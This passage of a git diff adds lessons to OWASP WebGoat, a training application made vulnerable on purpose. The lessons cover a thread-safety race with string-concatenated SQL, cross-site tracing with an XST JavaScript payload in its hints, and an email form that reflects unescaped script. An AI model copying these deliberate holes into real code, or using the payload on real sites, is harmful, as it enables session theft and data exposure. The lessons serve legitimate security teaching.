+	    s.setMessage("Error while getting message list.");
+	}
+
+	ElementContainer ec = new ElementContainer();
+	ec.addElement(new H1("Message List"));
+	ec.addElement(t);
+
+	return (ec);
+    }
+
+
+    private static String getNameroot(String name)
+    {
+	String nameroot = name;
+	if (nameroot.indexOf('-') != -1)
+	{
+	    nameroot = nameroot.substring(0, nameroot.indexOf('-'));
+	}
+	return nameroot;
+    }
+    
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java
new file mode 100644
index 000000000..6c1723d2e
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java
@@ -0,0 +1,215 @@
+package org.owasp.webgoat.lessons;
+
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.ResultSetMetaData;
+import java.sql.Statement;
+import java.util.ArrayList;
+import java.util.List;
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.A;
+
+import org.owasp.webgoat.session.*;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+public class ThreadSafetyProblem extends LessonAdapter
+{
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	
+    private final static String USER_NAME = "username";
+
+    private static String currentUser;
+
+    private String originalUser;
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+	    ec.addElement(new StringElement("Enter user name: "));
+	    ec.addElement(new Input(Input.TEXT, USER_NAME, ""));
+	    currentUser = s.getParser().getRawParameter(USER_NAME, "");
+	    originalUser = currentUser;
+
+	    // Store the user name
+	    String user1 = new String(currentUser);
+
+	    Element b = ECSFactory.makeButton("Submit");
+	    ec.addElement(b);
+	    ec.addElement(new P());
+
+	    if (!"".equals(currentUser))
+	    {
+		Thread.sleep(1500);
+
+		// Get the users info from the DB
+		String query = "SELECT * FROM user_system_data WHERE user_name = '"
+			+ currentUser + "'";
+		Statement statement = connection.createStatement(
+			ResultSet.TYPE_SCROLL_INSENSITIVE,
+			ResultSet.CONCUR_READ_ONLY);
+		ResultSet results = statement.executeQuery(query);
+
+		if ((results != null) && (results.first() == true))
+		{
+		    ec.addElement("Account information for user: "
+			    + originalUser + "<br><br>");
+		    ResultSetMetaData resultsMetaData = results.getMetaData();
+		    ec.addElement(DatabaseUtilities.writeTable(results,
+			    resultsMetaData));
+		}
+		else
+		{
+		    s.setMessage("'" + currentUser
+			    + "' is not a user in the WebGoat database.");
+		}
+	    }
+	    if (!user1.equals(currentUser))
+	    {
+		makeSuccess(s);
+	    }
+
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     *  Gets the hints attribute of the ConcurrencyScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("Web applications handle many HTTP requests at the same time.");
+	hints.add("Developers use variables that are not thread safe.");
+	hints
+		.add("Show the Java source code and trace the 'currentUser' variable");
+	hints
+		.add("Open two browsers and send 'jeff' in one and 'dave' in the other.");
+
+	return hints;
+    }
+
+
+    /**
+     *  Gets the instructions attribute of the ThreadSafetyProblem object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+
+	String instructions = "The user should be able to exploit the concurrency error in this web application "
+		+ "and view login information for another user that is attempting the same function "
+		+ "at the same time.  <b>This will require the use of two browsers</b>. Valid user "
+		+ "names are 'jeff' and 'dave'."
+		+ "<p>Please enter your username to access your account.";
+
+	return (instructions);
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(80);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    protected Category getDefaultCategory()
+    {
+	return Category.CONCURRENCY;
+    }
+
+
+    /**
+     *  Gets the title attribute of the ConcurrencyScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Thread Safety Problems");
+    }
+
+
+    /**
+     *  Constructor for the ConcurrencyScreen object
+     *
+     * @param  s  Description of the Parameter
+     */
+    public void handleRequest(WebSession s)
+    {
+	try
+	{
+	    super.handleRequest(s);
+	}
+	catch (Exception e)
+	{
+	    System.out.println("Exception caught: " + e);
+	    e.printStackTrace(System.out);
+	}
+    }
+    
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/TraceXSS.java b/main/project/JavaSource/org/owasp/webgoat/lessons/TraceXSS.java
new file mode 100644
index 000000000..5202afafb
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/TraceXSS.java
@@ -0,0 +1,286 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.regex.Pattern;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.util.HtmlEncoder;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 28, 2003
+ */
+
+public class TraceXSS extends LessonAdapter
+{
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+
+    protected Element createContent(WebSession s)
+    {
+
+	ElementContainer ec = new ElementContainer();
+	String regex1 = "^[0-9]{3}$";// any three digits
+	Pattern pattern1 = Pattern.compile(regex1);
+
+	try
+	{
+	    String param1 = s.getParser().getRawParameter("field1", "111");
+	    String param2 = HtmlEncoder.encode(s.getParser().getRawParameter(
+		    "field2", "4128 3214 0002 1999"));
+	    float quantity = 1.0f;
+	    float total = 0.0f;
+	    float runningTotal = 0.0f;
+
+	    // test input field1
+	    if (!pattern1.matcher(param1).matches())
+	    {
+		if (param1.toLowerCase().indexOf("script") != -1
+			&& param1.toLowerCase().indexOf("trace") != -1)
+		{
+		    makeSuccess(s);
+		}
+
+		s
+			.setMessage("Whoops! You entered "
+				+ param1
+				+ " instead of your three digit code.  Please try again.");
+	    }
+
+	    // FIXME: encode output of field2, then s.setMessage( field2 );
+
+	    ec.addElement(new HR().setWidth("90%"));
+	    ec.addElement(new Center().addElement(new H1()
+		    .addElement("Shopping Cart ")));
+	    Table t = new Table().setCellSpacing(0).setCellPadding(2)
+		    .setBorder(1).setWidth("90%").setAlign("center");
+
+	    if (s.isColor())
+	    {
+		t.setBorder(1);
+	    }
+
+	    TR tr = new TR();
+	    tr.addElement(new TH().addElement(
+		    "Shopping Cart Items -- To Buy Now").setWidth("80%"));
+	    tr.addElement(new TH().addElement("Price").setWidth("10%"));
+	    tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
+	    tr.addElement(new TH().addElement("Total").setWidth("7%"));
+	    t.addElement(tr);
+
+	    tr = new TR();
+	    tr
+		    .addElement(new TD()
+			    .addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
+	    tr.addElement(new TD().addElement("69.99").setAlign("right"));
+	    tr.addElement(new TD().addElement(
+		    new Input(Input.TEXT, "QTY1", s.getParser()
+			    .getStringParameter("QTY1", "1")))
+		    .setAlign("right"));
+	    quantity = s.getParser().getFloatParameter("QTY1", 1.0f);
+	    total = quantity * 69.99f;
+	    runningTotal += total;
+	    tr.addElement(new TD().addElement("$" + total));
+	    t.addElement(tr);
+	    tr = new TR();
+	    tr.addElement(new TD()
+		    .addElement("Dynex - Traditional Notebook Case"));
+	    tr.addElement(new TD().addElement("27.99").setAlign("right"));
+	    tr.addElement(new TD().addElement(
+		    new Input(Input.TEXT, "QTY2", s.getParser()
+			    .getStringParameter("QTY2", "1")))
+		    .setAlign("right"));
+	    quantity = s.getParser().getFloatParameter("QTY2", 1.0f);
+	    total = quantity * 27.99f;
+	    runningTotal += total;
+	    tr.addElement(new TD().addElement("$" + total));
+	    t.addElement(tr);
+	    tr = new TR();
+	    tr
+		    .addElement(new TD()
+			    .addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™"));
+	    tr.addElement(new TD().addElement("1599.99").setAlign("right"));
+	    tr.addElement(new TD().addElement(
+		    new Input(Input.TEXT, "QTY3", s.getParser()
+			    .getStringParameter("QTY3", "1")))
+		    .setAlign("right"));
+	    quantity = s.getParser().getFloatParameter("QTY3", 1.0f);
+	    total = quantity * 1599.99f;
+	    runningTotal += total;
+	    tr.addElement(new TD().addElement("$" + total));
+	    t.addElement(tr);
+	    tr = new TR();
+	    tr
+		    .addElement(new TD()
+			    .addElement("3 - Year Performance Service Plan $1000 and Over "));
+	    tr.addElement(new TD().addElement("299.99").setAlign("right"));
+
+	    tr.addElement(new TD().addElement(
+		    new Input(Input.TEXT, "QTY4", s.getParser()
+			    .getStringParameter("QTY4", "1")))
+		    .setAlign("right"));
+	    quantity = s.getParser().getFloatParameter("QTY4", 1.0f);
+	    total = quantity * 299.99f;
+	    runningTotal += total;
+	    tr.addElement(new TD().addElement("$" + total));
+	    t.addElement(tr);
+
+	    ec.addElement(t);
+
+	    t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
+		    .setWidth("90%").setAlign("center");
+
+	    if (s.isColor())
+	    {
+		t.setBorder(1);
+	    }
+
+	    ec.addElement(new BR());
+
+	    tr = new TR();
+	    tr.addElement(new TD()
+		    .addElement("The total charged to your credit card:"));
+	    tr.addElement(new TD().addElement("$" + runningTotal));
+	    tr.addElement(new TD().addElement(ECSFactory
+		    .makeButton("Update Cart")));
+	    t.addElement(tr);
+	    tr = new TR();
+	    tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+	    t.addElement(tr);
+	    tr = new TR();
+	    tr
+		    .addElement(new TD()
+			    .addElement("Enter your credit card number:"));
+	    tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2",
+		    param2)));
+	    t.addElement(tr);
+	    tr = new TR();
+	    tr.addElement(new TD()
+		    .addElement("Enter your three digit access code:"));
+	    tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",
+		    param1)));
+	    t.addElement(tr);
+
+	    Element b = ECSFactory.makeButton("Purchase");
+	    tr = new TR();
+	    tr.addElement(new TD().addElement(b).setColSpan(2).setAlign(
+		    "center"));
+	    t.addElement(tr);
+
+	    ec.addElement(t);
+	    ec.addElement(new BR());
+	    ec.addElement(new HR().setWidth("90%"));
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+	return (ec);
+    }
+
+
+    /**
+     *  DOCUMENT ME!
+     *
+     * @return    DOCUMENT ME!
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.XSS;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the AccessControlScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("Most web servers support GET/POST.  Many default installations also support TRACE");
+	hints
+		.add("JavaScript has the ability to post a URL:<br>"
+			+ "&lt;script type=\"text/javascript\"&gt;if ( navigator.appName.indexOf(\"Microsoft\") !=-1)"
+			+ " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"GET\", \"./\", false);"
+			+ " xmlHttp.send();str1=xmlHttp.responseText;  "
+			+ "document.write(str1);&lt;/script&gt;");
+	hints.add("Try changing the HTTP GET to a HTTP TRACE");
+	hints
+		.add("Try a cross site trace (XST) Command:<br>"
+			+ "&lt;script type=\"text/javascript\"&gt;if ( navigator.appName.indexOf(\"Microsoft\") !=-1)"
+			+ " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\", \"./\", false);"
+			+ " xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf(\"\\n\") > -1) str1 = str1.replace(\"\\n\",\"&lt;br&gt;\"); "
+			+ "document.write(str1);}&lt;/script&gt;");
+	return hints;
+    }
+
+    //	<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText;document.write(str1);}</script>
+
+    private final static Integer DEFAULT_RANKING = new Integer(130);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the AccessControlScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Cross Site Tracing (XST) Attacks");
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java b/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java
new file mode 100644
index 000000000..75b9036fd
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java
@@ -0,0 +1,429 @@
+package org.owasp.webgoat.lessons;
+
+import java.text.Format;
+import java.text.SimpleDateFormat;
+import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.Date;
+import java.util.List;
+import java.util.Properties;
+
+import javax.mail.Message;
+import javax.mail.MessagingException;
+import javax.mail.PasswordAuthentication;
+import javax.mail.Session;
+import javax.mail.Transport;
+import javax.mail.internet.InternetAddress;
+import javax.mail.internet.MimeMessage;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.H3;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.apache.ecs.html.TextArea;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+ */
+
+public class UncheckedEmail extends LessonAdapter
+{
+	private final String YOUR_REAL_GMAIL_PASSWORD = "password";
+
+	private final String YOUR_REAL_GMAIL_ID = "GMail id";
+
+	private final static String MESSAGE = "msg";
+
+	private final static String HIDDEN_TO = "to";
+	private final static String SUBJECT = "subject";
+	private final static String GMAIL_ID = "gId";
+	private final static String GMAIL_PASS = "gPass";
+
+	private static final String SMTP_HOST_NAME = "smtp.gmail.com";
+	private static final String SMTP_PORT = "465";
+	private static final String emailFromAddress = "webgoat@owasp.org";
+	private static final String SSL_FACTORY = "javax.net.ssl.SSLSocketFactory";
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	protected Element createContent(WebSession s)
+	{
+
+		ElementContainer ec = new ElementContainer();
+		try
+		{
+			String to = s.getParser().getRawParameter(HIDDEN_TO, "");
+			String gId = s.getParser().getRawParameter(GMAIL_ID, "");
+			String gPass = s.getParser().getRawParameter(GMAIL_PASS, "");
+			String message = s.getParser().getRawParameter(MESSAGE, "");
+			String subject = s.getParser().getRawParameter(SUBJECT, "");
+
+			boolean haveCredentials = !(YOUR_REAL_GMAIL_ID.equals(gId) || YOUR_REAL_GMAIL_PASSWORD.equals(gPass));
+
+			ec.addElement(new HR());
+			createGoogleCredentials(s, ec);
+			ec.addElement(new HR());
+			ec.addElement(new BR());
+			createMailMessage(s, subject, message, ec);
+
+			ec.addElement(new HR());
+			if (to.length() > 0)
+			{
+
+				if (haveCredentials)
+				{
+					Message sentMessage = sendGoogleMail(to, subject, message, emailFromAddress, gId, gPass);
+					formatMail(ec, sentMessage);
+				} else
+				{
+					sendSimulatedMail(ec, to, subject, message);
+				}
+			}
+
+			// only complete the lesson if they changed the "to" hidden field
+			if (to.length() > 0 && !"webgoat.admin@owasp.org".equals(to))
+			{
+				makeSuccess(s);
+			}
+		}
+		catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+		return (ec);
+	}
+
+	private void formatMail(ElementContainer ec, Message sentMessage)
+	{
+		try
+		{
+			ec.addElement(new Center().addElement(new B().addElement("You sent the following message to: "
+																	 + Arrays.asList(sentMessage.getAllRecipients()))));
+			ec.addElement(new BR());
+			ec.addElement(new StringElement("<b>MAIL FROM:</b> " + Arrays.asList(sentMessage.getReplyTo())));
+			ec.addElement(new BR());
+			ec.addElement(new StringElement("<b>RCPT TO:</b> " + Arrays.asList(sentMessage.getAllRecipients())));
+			ec.addElement(new BR());
+			ec
+					.addElement(new StringElement("<b>Message-ID:</b> "
+												  + Arrays.asList(sentMessage.getHeader("Message-ID"))));
+			ec.addElement(new BR());
+			ec.addElement(new StringElement("<b>Date:</b> " + sentMessage.getSentDate()));
+			ec.addElement(new BR());
+			ec.addElement(new StringElement("<b>Subject:</b> " + sentMessage.getSubject()));
+			ec.addElement(new BR());
+			ec.addElement(new StringElement("<b>Message:</b> "));
+			ec.addElement(new BR());
+			ec.addElement(new BR());
+			ec.addElement(new StringElement(sentMessage.getContent().toString()));
+		}
+		catch (Exception e)
+		{
+			// TODO Auto-generated catch block
+			ec.addElement(new StringElement("Fatal error while sending message"));
+			ec.addElement(new BR());
+			ec.addElement(new StringElement(e.getMessage()));
+		}
+
+	}
+
+	/**
+	 * @param ec
+	 * @param to
+	 * @param message
+	 */
+	private void sendSimulatedMail(ElementContainer ec, String to, String subject, String message)
+	{
+		Format formatter;
+		// Get today's date
+		Date date = new Date();
+		formatter = new SimpleDateFormat("E, dd MMM yyyy HH:mm:ss Z");
+		String today = formatter.format(date);
+		// Tue, 09 Jan 2002 22:14:02 -0500
+
+		ec.addElement(new Center().addElement(new B().addElement("You sent the following message to: " + to)));
+		ec.addElement(new BR());
+		ec.addElement(new StringElement("<b>Return-Path:</b> &lt;webgoat@owasp.org&gt;"));
+		ec.addElement(new BR());
+		ec.addElement(new StringElement("<b>Delivered-To:</b> " + to));
+		ec.addElement(new BR());
+		ec.addElement(new StringElement("<b>Received:</b> (qmail 614458 invoked by uid 239); " + today));
+		ec.addElement(new BR());
+		ec.addElement(new StringElement("for &lt;" + to + "&gt;; " + today));
+		ec.addElement(new BR());
+		ec.addElement(new StringElement("<b>To:</b> " + to));
+		ec.addElement(new BR());
+		ec.addElement(new StringElement("<b>From:</b> Blame it on the Goat &lt;webgoat@owasp.org&gt;"));
+		ec.addElement(new BR());
+		ec.addElement(new StringElement("<b>Subject:</b> " + subject));
+		ec.addElement(new BR());
+		ec.addElement(new BR());
+		ec.addElement(new StringElement(message));
+	}
+
+	/**
+	 * @param s
+	 * @param ec
+	 * @return
+	 */
+	private void createMailMessage(WebSession s, String subject, String message, ElementContainer ec)
+	{
+		TR tr;
+		Input input;
+		Table t = new Table().setCellSpacing(0).setCellPadding(1).setBorder(0).setWidth("90%").setAlign("center");
+
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+
+		tr = new TR();
+		tr.addElement(new TH().addElement("Send OWASP your Comments<BR>").setAlign("left").setColSpan(3));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(3));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TH().addElement(new H1("Contact Us")).setAlign("left").setWidth("55%").setVAlign("BOTTOM")
+				.setColSpan(2));
+		tr.addElement(new TH().addElement(new H3("Contact Information:")).setAlign("left").setVAlign("BOTTOM"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement(
+										  "We value your comments.  " + "To send OWASP your questions or comments "
+												  + "regarding the WebGoat tool, please enter your "
+												  + "comments below.  The information you provide will be "
+												  + "handled according to our <U>Privacy Policy</U>.").setColSpan(2));
+		tr.addElement(new TD().addElement(
+										  "<b>OWASP</B><BR>" + "9175 Guilford Rd <BR> Suite 300 <BR>"
+												  + "Columbia, MD.  21046").setVAlign("top"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(3));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("Subject:"));
+		input = new Input(Input.TEXT, SUBJECT, "Comment for WebGoat");
+		tr.addElement(new TD().setAlign("LEFT").addElement(input));
+		tr.addElement(new TD().addElement("&nbsp;"));
+		t.addElement(tr);
+
+		input = new Input(Input.HIDDEN, HIDDEN_TO, "webgoat.admin@owasp.org");
+		tr = new TR();
+		tr.addElement(new TD().addElement("Questions or Comments:").setColSpan(2));
+		tr.addElement(new TD().setAlign("LEFT").addElement(input));
+		t.addElement(tr);
+
+		tr = new TR();
+		TextArea ta = new TextArea(MESSAGE, 5, 40);
+		ta.addElement(new StringElement(convertMetachars(message)));
+		tr.addElement(new TD().setAlign("LEFT").addElement(ta).setColSpan(2));
+		tr.addElement(new TD().setAlign("LEFT").setVAlign("MIDDLE").addElement(ECSFactory.makeButton("Send!")));
+		t.addElement(tr);
+		ec.addElement(t);
+	}
+
+	/**
+	 * @param s
+	 * @param ec
+	 */
+	private void createGoogleCredentials(WebSession s, ElementContainer ec)
+	{
+		// Allow the user to configure a real email interface using gmail
+		Table t1 = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+		t1.setStyle("border-width:3px; border-style: solid;");
+		if (s.isColor())
+		{
+			t1.setBorder(1);
+		}
+
+		TR tr = new TR();
+		tr.addElement(new TH().addElement("Google Mail Configuration (Optional)").setAlign("center").setColSpan(2));
+		t1.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setAlign("left").setColSpan(2));
+		t1.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD()
+				.addElement(
+							"These configurations will enable WebGoat to send email on your "
+									+ "behalf using your gmail account.  Leave them as the default value "
+									+ "to use WebGoat's simulated mail.").setAlign("left").setColSpan(2));
+		t1.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setAlign("left").setColSpan(2));
+		t1.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("GMail login id:"));
+		Input input = new Input(Input.TEXT, GMAIL_ID, YOUR_REAL_GMAIL_ID);
+		tr.addElement(new TD().addElement(input));
+		t1.addElement(tr);
+		tr = new TR();
+		tr.addElement(new TD().addElement("GMail password:"));
+		input = new Input(Input.PASSWORD, GMAIL_PASS, YOUR_REAL_GMAIL_PASSWORD);
+		tr.addElement(new TD().addElement(input));
+		t1.addElement(tr);
+		ec.addElement(t1);
+
+	}
+
+	private Message sendGoogleMail(String recipients, String subject, String message, String from,
+								   final String mailAccount, final String mailPassword) throws MessagingException
+	{
+		boolean debug = false;
+
+		Properties props = new Properties();
+		props.put("mail.smtp.host", SMTP_HOST_NAME);
+		props.put("mail.smtp.auth", "true");
+		props.put("mail.debug", "false");
+		props.put("mail.smtp.port", SMTP_PORT);
+		props.put("mail.smtp.socketFactory.port", SMTP_PORT);
+		props.put("mail.smtp.socketFactory.class", SSL_FACTORY);
+		props.put("mail.smtp.socketFactory.fallback", "false");
+
+		Session session = Session.getDefaultInstance(props, new javax.mail.Authenticator()
+		{
+
+			protected PasswordAuthentication getPasswordAuthentication()
+			{
+				return new PasswordAuthentication(mailAccount, mailPassword);
+			}
+		});
+
+		session.setDebug(debug);
+
+		Message msg = new MimeMessage(session);
+		InternetAddress addressFrom = new InternetAddress(from);
+		msg.setFrom(addressFrom);
+
+		InternetAddress[] addressTo = new InternetAddress[1];
+		// for (int i = 0; i < recipients.length; i++)
+		// {
+		addressTo[0] = new InternetAddress(recipients);
+		// }
+		msg.setRecipients(Message.RecipientType.TO, addressTo);
+
+		// Setting the Subject and Content Type
+		msg.setSubject(subject);
+		msg.setContent(message, "text/plain");
+		Transport.send(msg);
+
+		return msg;
+	}
+
+	/**
+	 * DOCUMENT ME!
+	 * 
+	 * @return DOCUMENT ME!
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.UNVALIDATED_PARAMETERS;
+	}
+
+	/**
+	 * Gets the hints attribute of the EmailScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("Try sending an anonymous message to yourself.");
+		hints.add("Try inserting some html or javascript code in the message field");
+		hints.add("Look at the hidden fields in the HTML.");
+		hints
+				.add("Insert &lt;A href=\"http://code.google.com/p/webgoat/\"&gt;Click here for the WebGoat Project&lt;/A&gt in the message field");
+		hints.add("Insert &lt;script&gt;alert(\"Bad Stuff\");&lt;/script&gt; in the message field");
+		return hints;
+	}
+
+	/**
+	 * Gets the instructions attribute of the UncheckedEmail object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions =
+				"This form is an example of a customer support page.  Using the form below try to:<br>"
+						+ "1) Send a malicious script to the website admin.<br>"
+						+ "2) Send a malicious script to a 'friend' from OWASP.<br>";
+		return (instructions);
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(55);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the EmailScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Exploit Unchecked Email");
+	}
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java
new file mode 100644
index 000000000..30e96f3d2
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java
@@ -0,0 +1,359 @@
+/*
+ * Created on May 26, 2005
+ *
+ * TODO To change the template for this generated file go to
+ * Window - Preferences - Java - Code Style - Code Templates
+ */
+package org.owasp.webgoat.lessons;
+
+import java.rmi.RemoteException;
+import java.sql.Connection;
+import java.sql.PreparedStatement;
